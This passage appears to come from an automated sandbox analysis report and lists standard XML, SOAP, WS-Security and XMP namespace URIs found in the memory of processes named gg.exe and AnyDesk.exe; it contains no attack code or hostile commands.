                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpExt/2008-02-29/
                                Source: AnyDesk.exe, 00000010.00000002.2893264351.0000000006E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.
                                Source: AnyDesk.exe, 00000010.00000002.2893264351.0000000006E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.xap/1.0/sType/Reent#
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://ns.useplus.org/ldf/xmp/1.0/
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
